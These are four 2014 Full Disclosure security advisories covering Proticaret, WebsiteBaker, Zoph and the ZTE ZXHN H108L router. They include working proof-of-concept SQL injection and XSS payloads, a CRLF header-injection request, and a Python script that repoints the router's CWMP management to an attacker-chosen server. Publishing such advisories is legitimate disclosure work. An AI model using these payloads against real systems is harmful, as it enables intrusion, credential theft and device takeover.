[FD] Proticaret E-Commerce Script v3.0 SQL Injection
Document Title: Proticaret E-Commerce Script v3.0 = SQL Injection Release Date: === 13 Nov 2014 Product Service Introduction: Proticaret is a free e-commerce script. Abstract Advisory Information: === BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0 Vulnerability Disclosure Timeline: = 20 Oct 2014:Contact with Vendor 20 Nov 2014:Vendor Response June 26, 2014 :Patch Released 13 Nov 2014:Public Disclosure Discovery Status: = Published Affected Product(s): === Promist Bilgi İletişim Teknolojileri A.Ş Product: Proticaret E-commerce Script v3.0 = Exploitation Technique: == Remote, Unauthenticated Severity Level: === Critical Technical Details Description: SQL Injection Proof of Concept (PoC): == Proof of Concept Request: soapenv:Envelope xmlns:soapenv=http://schemas.xmlsoap.org/soap/envelope/; xmlns:tem=http://tempuri.org/; soapenv:Header/ soapenv:Body tem:GetProductCodes !--Optional:-- tem:Code1' from Users where (select top 1 password from users where userId=101)1--/tem:Code !--Optional:-- tem:StartWith?/tem:StartWith /tem:GetProductCodes /soapenv:Body /soapenv:Envelope Response: soap:Envelope xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/; xmlns:xsi=http://www.w3.org/2001/XMLSchema-instance; xmlns:xsd=http://www.w3.org/2001/XMLSchema; soap:Body soap:Fault faultcodesoap:Server/faultcode faultstringSystem.Web.Services.Protocols.SoapException: Server was unable to process request. --- System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int. at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Booleanamp; dataReady) at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Booleanamp; moreRows) at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Booleanamp; more) at System.Data.SqlClient.SqlDataReader.Read() at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith) --- End of inner exception stack trace ---/faultstring detail/ /soap:Fault /soap:Body /soap:Envelope Solution Fix Patch: Apply the patch for v3.0 Security Risk: == The risk of the vulnerabilities above estimated as critical. Credits Authors: == Bilgi Güvenliği Akademisi Disclaimer Information: === The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain:www.bga.com.tr Social:twitter.com/bgasecurity Contact:bi...@bga.com.tr Copyright © 2014 | BGA ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] WebsiteBaker =2.8.3 - Multiple Vulnerabilities
= MGC ALERT 2014-004 - Original release date: March 11, 2014 - Last revised: November 18, 2014 - Discovered by: Manuel Garcia Cardenas - Severity: 10/10 (CVSS Base Score) = I. VULNERABILITY - Multiple Vulnerabilities in WebsiteBaker 2.8.3 II. BACKGROUND - WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS). III. DESCRIPTION - It is possible to inject SQL code in the variable id on the page modify.php. This bug was found using the portal without authentication. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. Has been detected a reflected XSS vulnerability in WebsiteBaker, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. An input validation problem exists within WebsiteBaker which allows injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n) characters into the server HTTP response header, resulting in a HTTP Response Splitting Vulnerability. IV. PROOF OF CONCEPT - SQL Injection: /wb/admin/pages/modify.php?page_id=1 Cross-Site Scripting GET: /wb/admin/admintools/tool.php?tool=captcha_control6d442scriptalert(1)/script8e3b12642a8=1 /wb/modules/edit_module_files.php?page_id=1mod_dir=newsedit_file=frontend.cssaction=editpage_id=1section_id=%007e393scriptalert(1)/script9f8a40a7355f9acf0 /wb/modules/news/add_post.php?page_id=1section_id=f953ascriptalert(1)/script4ddf3369c1f /wb/modules/news/modify_group.php?page_id=1section_id=%008cf03scriptalert(1)/script2680504c3ecgroup_id=62be99873b33d1d3 /wb/modules/news/modify_post.php?page_id=1section_id=%003874ascriptalert(1)/script4194d511605post_id=db89943875a2db52 /wb/modules/news/modify_settings.php?page_id=1section_id=%008b2f4scriptalert(1)/scriptbdc8b3919b5 HTTP RESPONSE SPLITTING: If you enter a valid user and password, you can inject on the headers malicious code, example. POST /wb/admin/login/index.php HTTP/1.1 Content-Length: 204 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.244.129:80/wb/ Host: 127.0.0.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* password_fieldname=password_nwh1uuwbpassword_nwh1uuwb=VALIDPASSremember=truesubmit=Entrar url=%0d%0a%20InjectedHeader:MaliciousCodeusername_fieldname=username_nwh1uuwbusername_nwh1uuwb=adminResponse You can inject a new header named: InjectedHeader:MaliciousCode because we inject a CRLF new line with %0d%0a%20. V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - WebsiteBaker = 2.8.3 VII. SOLUTION - No news releases VIII. REFERENCES - http://www.websitebaker.org IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - March 11, 2014 1: Initial release XI. DISCLOSURE TIMELINE - March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas March 11, 2014 2: Send to vendor June 05, 2014 3: Second mail to the verdor without response November 18, 2014 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Zoph = 0.9.1 - Multiple Vulnerabilities
= MGC ALERT 2014-005 - Original release date: March 5, 2014 - Last revised: November 18, 2014 - Discovered by: Manuel Garcia Cardenas - Severity: 10/10 (CVSS Base Score) = I. VULNERABILITY - Multiple Vulnerabilities in Zoph = 0.9.1 II. BACKGROUND - Zoph (Zoph Organizes Photos) is a web based digital image presentation and management system. In other words, a photo album. It is built with PHP, MySQL and Perl. III. DESCRIPTION - It is possible to inject SQL code in the variables id and action on the pages group, photos and user. This bug was found using the portal with authentication. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. Has been detected a reflected XSS vulnerability in Zoph, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT - SQL Injection: /zoph/php/group.php?_action=1'%22_clear_crumbs=1 /zoph/php/photos.php?location_id=1'%22 /zoph/php/user.php?user_id=_action=1'%22 Cross-Site Scripting GET: /zoph/php/edit_photos.php?photographer_id=3scriptalert(1)/script /zoph/php/edit_photos.php?album_id=2_crumb=3scriptalert(1)/script V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - Zoph = 0.9.1 VII. SOLUTION - No news releases VIII. REFERENCES - http://www.zoph.org/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - March 11, 2014 1: Initial release XI. DISCLOSURE TIMELINE - March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas March 5, 2014 2: Send to vendor June 17, 2014 3: Second mail to the verdor without response November 18, 2014 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2014-8493 - ZTE ZXHN H108L Authentication Bypass
About the software == ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers. Vulnerability Details = CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting their subscribers' equipment. However editing the CWMP configuration (more specifically sending the POST request) does not require any user authentication. Affected Products = Device model : ZTE ZXHN H108L Firmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4 Proof of Concept #!/usr/bin/python import requests acs_server = http://server:port acs_user = user acs_pass = pass # Connection request parameters. When a request is made to the following URL, using the specified user/pass combination, # router will connect back to the ACS server. conn_url = /tr069 conn_port = 7564 conn_user = user conn_pass = pass #Periodic inform parameters active = 1 interval = 2000 payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' } r = requests.post(http://192.168.1.254/Forms/access_cwmp_1;, data=payload) Impact == The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to WAN. Also because the router lacks of CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a malicious web page. Severity Medium References == https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/ Disclosure Timeline === 27/10/2014 - First communication attempt to both vendor and ISP 04/11/2014 - ZTE response states that ISP should be contacted 03/11/2014 - Second attempt to contact the ISP. 14/11/2014 - No response from ISP. Public Disclosure Contact Information === Domain:https://projectzero.gr Social:twitter.com/projectzerolabs Contact:labs _at_ projectzero.gr ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/